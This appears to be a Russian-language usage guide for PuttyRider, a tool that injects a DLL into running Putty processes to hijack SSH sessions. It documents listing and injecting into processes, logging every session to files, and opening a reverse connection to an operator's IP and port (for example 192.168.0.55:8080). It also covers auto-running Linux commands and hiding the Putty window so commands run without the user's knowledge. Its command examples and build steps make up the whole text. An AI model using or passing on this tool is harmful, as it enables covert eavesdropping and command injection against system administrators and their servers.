
Угоняйте сессии Putty, чтобы прослушивать разговор и внедрять команды Linux.
Перехватывайте сессии Putty для прослушивания диалогов и внедрения команд Linux.
Вывод списка существующих процессов Putty и их статуса (внедрён / не внедрён)
PuttyRider.exe -l
Внедрить DLL в первый найденный putty.exe и инициировать обратное соединение от DLL к моему IP:Port, затем выйти из PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Запуск в фоновом режиме и ожидание новых процессов Putty. Внедрять в любой новый putty.exe и записывать все диалоги в локальные файлы.
PuttyRider.exe -w -f
Извлечь PuttyRider.dll из всех процессов Putty, где она уже внедрена. (Не забудьте завершить PuttyRider.exe, если он работает в режиме -w, иначе он внедрит DLL снова.)
PuttyRider.exe -x
Режимы работы:
-l Вывести список запущенных процессов Putty и их соединений
-w Внедрить во все существующие сессии Putty и ожидать появления новых сессий
для внедрения в них тоже
-p PID Внедрить только в существующую сессию Putty, идентифицированную по PID.
Если PID==0, внедрить в первый найденный Putty
-x Очистка. Удалить DLL из всех запущенных экземпляров Putty
-d Режим отладки. Работает только с режимом -p
-c CMD Автоматически выполнить команду Linux после успешного внедрения
PuttyRider удалит конечные пробелы и символ '&' из CMD
PuttyRider добавит: " 1>/dev/null 2>/dev/null &" к CMD
-h Вывести эту справку
Режимы вывода:
-f Записывать все диалоги Putty в файл в локальной директории.
Имя файла будет содержать PID текущего putty.exe
-r IP:PORT Инициировать обратное соединение с указанной машиной и
начать интерактивную сессию.
Интерактивные команды (после получения обратного соединения):
!status Посмотреть, подключено ли окно Putty к вводу пользователя
!discon Отключить главное окно Putty, чтобы оно ничего не отображало
Это полезно для отправки команд без ведома пользователя
!recon Переподключить окно Putty к его нормальному режиму работы
CMD Команды оболочки Linux
!exit Завершить это соединение
!help Вывести справку для клиентского соединения
Используйте командную строку Visual Studio:
nmake main dll
Спасибо Бретту Муру из Insomnia Security за его доказательство концепции PuttyHijack